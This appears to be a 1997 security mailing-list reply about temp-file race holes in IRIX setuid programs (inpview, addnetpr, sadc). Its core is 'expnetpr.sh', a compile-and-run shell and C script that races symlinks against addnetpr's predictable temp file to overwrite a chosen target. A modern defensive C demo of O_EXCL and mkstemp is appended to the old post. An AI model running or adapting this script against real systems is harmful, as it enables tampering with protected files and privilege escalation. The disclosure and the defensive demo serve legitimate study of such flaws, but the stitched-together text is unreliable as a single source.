Re: Irix: misc

Jaechul Choe (poison@COSMOS.KAIST.AC.KR)
Fri, 09 May 1997 06:33:46 +0900

Wow, your work is so fertile and wonderful.
Let me add some stuff.

>
>
> 1. /usr/lib/InPerson/inpview
>
> inpview is part of InPerson desktop video conferencing package. It's
> root-owned/suid and is written in a classic SGI suid-programming style, i.e.
> in the course of execution inpview, without dropping euid=0, starts program
> ttsession, using system() and without bothering to use absolute path. So
> it's pretty much like suid shell sitting around, in case you forget root
> password. It does all kinds of other dangerous stuff as well, e.g.
> predictable tmp files.
>

The template for one of the tmp files is "/var/tmp/ioAAAXXXXXX".
I was trying to write a script exploiting the race condition last year,
but for some reason I couldn't figure out at the time, the race didn't run
well and I quit soon.

There was the same race condition in the program /usr/lib/addnetpr, another
suid root program for printing.
Here is the exploit script for it.
But though I tried, it was hard to find a way to get root with it.
It can fill the target with the two arguments of addnetpr, but with some
messages I was unable to control.
And it will prompt a window asking for the root passwd to non-privileged (not
root, but IRIX-specific privileged) users.
Privileged users bypass the window and can run the race.

Tested on both IRIX 5.3 and 6.2.

---------------)<-----------cut expnetpr.sh ---------------)<----------------

#!/bin/sh

PROG="`basename $0`"
if [ $# -ne 1 ]; then
    echo "Usage: $PROG <target>"
    exit 1
fi

cat > expnetpr.c << _CREDIT_TO_ZOMO_
#include <stdlib.h>     /* mktemp */
#include <unistd.h>     /* fork, sleep, execl, symlink, unlink */
#include <sys/stat.h>   /* umask */

int main(int argc, char *argv[])
{
    /* mktemp() rewrites the XXXXXX in place, so the template has to be a
       writable array rather than a string literal */
    char template[] = "/var/tmp/printersXXXXXX";
    char *target;
    int pid;

    if (argc != 2)
        return 1;

    /* same template addnetpr uses for its own tmp file */
    target = mktemp(template);

    if ((pid = fork()) > 0) {
        /* parent: give the child a head start, then run addnetpr */
        sleep(3);
        umask(0);
        execl("/usr/lib/addnetpr", "addnetpr", "localhost", "+", (char *)0);
    } else {
        /* child: keep re-creating the link until killed by the script */
        while (1) {
            symlink(argv[1], target);
            unlink(target);
        }
    }
    return 0;
}
_CREDIT_TO_ZOMO_

/bin/cc expnetpr.c -o expnetpr
if [ ! -f expnetpr ]; then
    echo "Couldn't compile expnetpr.c, lame! \nMake sure that C compiler has been installed from the IDO"
    exit 1
fi

while true
do
    ./expnetpr $1 &
    PID=$!
    sleep 15
    ls -al $1
    killall expnetpr
    killall addnetpr
done

--------------------)<------------ cut ---------------)<-------------------

And one more: as addressed in [8lgm]-Advisory-11.UNIX.sadc.07-Jan-1992
and the SGI security FAQ, there is a hole in /usr/lib/sa/sadc.
That's on both IRIX 5.3 and 6.2.
The tmp file to link to the target is /tmp/sa_adrfl
(
114mS stat(/tmp/sa.adrfl, 0x10042dd8) errno = 2 (No such file or directory)
115mS umask(0) = 0
116mS open(/tmp/sa.adrfl, O_RDWR|O_CREAT|O_TRUNC, 0664) = 3
)
sadc is sgid sys in IRIX, so the hole may be minor,
but won't it be of help to get root in conjunction with another program?
I was surprised to find the hole still existed in IRIX 6.2 then.
SGI might be indifferent enough.
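Both the addnetpr and the sadc cases in this post come down to the same thing: a privileged program opens a predictable name under /tmp with O_CREAT but without O_EXCL, so whatever link is sitting at that name gets followed. The C program below is an added example, not code from the post or from SGI; it assumes only a POSIX system and works entirely inside a private directory it creates with mkdtemp(). It plants a symlink at a constructed predictable name (modelled on the /tmp/sa.adrfl open in the trace above, but inside the private directory), then shows that O_RDWR|O_CREAT|O_TRUNC follows the link and truncates the file it points at, that O_RDWR|O_CREAT|O_EXCL refuses with EEXIST, and that mkstemp() yields a fresh mode-0600 regular file with no name to predict. All function names (demo_make_dir, demo_open, demo_mkstemp, demo_run_all, demo_cleanup) are my own.

```c
#define _XOPEN_SOURCE 700
#define _DEFAULT_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Outcomes returned to the caller so they can be checked without parsing output. */
enum { CLOBBERED = 1, REFUSED = 2, DEMO_ERROR = -1 };

/* Private scratch directory for the demo; mkdtemp() is the directory form of
 * the same atomic, O_EXCL-style creation that the fix below relies on. */
int demo_make_dir(char *buf, size_t len) {
    snprintf(buf, len, "/tmp/tmprace_demo.XXXXXX");
    return mkdtemp(buf) == NULL ? -1 : 0;
}

/* Write a small "protected" file inside dir (constructed data) and return its path. */
static int make_victim(const char *dir, char *buf, size_t len) {
    int fd;
    snprintf(buf, len, "%s/protected.txt", dir);
    fd = open(buf, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return -1;
    if (write(fd, "original contents\n", 18) != 18) { close(fd); return -1; }
    close(fd);
    return 0;
}

/* Model the state after the race has been won: a symlink already sits at the
 * name the privileged program is about to open, pointing at the protected
 * file. Then open that name the way the program would. exclusive == 0 uses
 * the flags from the sadc trace (O_RDWR|O_CREAT|O_TRUNC); exclusive != 0
 * uses O_RDWR|O_CREAT|O_EXCL, the standard fix for temp-file creation. */
int demo_open(const char *dir, int exclusive) {
    char victim[PATH_MAX], tmpname[PATH_MAX];
    struct stat st;
    int fd, flags;

    if (make_victim(dir, victim, sizeof victim) != 0) return DEMO_ERROR;
    snprintf(tmpname, sizeof tmpname, "%s/sa.adrfl", dir);
    unlink(tmpname);
    if (symlink(victim, tmpname) != 0) return DEMO_ERROR;

    flags = O_RDWR | O_CREAT | (exclusive ? O_EXCL : O_TRUNC);
    fd = open(tmpname, flags, 0664);
    if (fd < 0) {
        /* O_CREAT|O_EXCL refuses any existing name, even a dangling symlink. */
        return (exclusive && errno == EEXIST) ? REFUSED : DEMO_ERROR;
    }
    close(fd);
    /* Without O_EXCL the link was followed and the protected file truncated. */
    if (stat(victim, &st) != 0) return DEMO_ERROR;
    return st.st_size == 0 ? CLOBBERED : DEMO_ERROR;
}

/* The mkstemp() alternative: an unpredictable name, created atomically with
 * O_EXCL and mode 0600. Returns 1 when the descriptor refers to a fresh
 * regular file owned by the caller. */
int demo_mkstemp(const char *dir) {
    char tmpl[PATH_MAX];
    struct stat st;
    int fd, ok;

    snprintf(tmpl, sizeof tmpl, "%s/saXXXXXX", dir);
    fd = mkstemp(tmpl);
    if (fd < 0) return 0;
    ok = fstat(fd, &st) == 0 && S_ISREG(st.st_mode)
         && (st.st_mode & 0777) == 0600 && st.st_uid == getuid();
    close(fd);
    unlink(tmpl);
    return ok;
}

/* Remove everything the demo created. */
void demo_cleanup(const char *dir) {
    char p[PATH_MAX];
    snprintf(p, sizeof p, "%s/sa.adrfl", dir); unlink(p);
    snprintf(p, sizeof p, "%s/protected.txt", dir); unlink(p);
    rmdir(dir);
}

/* Run all three checks; 1 means each behaved as described above. */
int demo_run_all(void) {
    char dir[PATH_MAX];
    int ok;
    if (demo_make_dir(dir, sizeof dir) != 0) return 0;
    ok = demo_open(dir, 0) == CLOBBERED
      && demo_open(dir, 1) == REFUSED
      && demo_mkstemp(dir) == 1;
    demo_cleanup(dir);
    return ok;
}

int main(void) {
    printf("O_TRUNC follows link, O_EXCL refuses, mkstemp is safe: %s\n",
           demo_run_all() ? "yes" : "unexpected result");
    return 0;
}
```

The protected_symlinks sysctl on newer Linux kernels does not interfere here because the link lives in a directory the demo owns, not in a world-writable sticky directory; on a real /tmp that sysctl is an extra layer, not a substitute for O_EXCL or mkstemp().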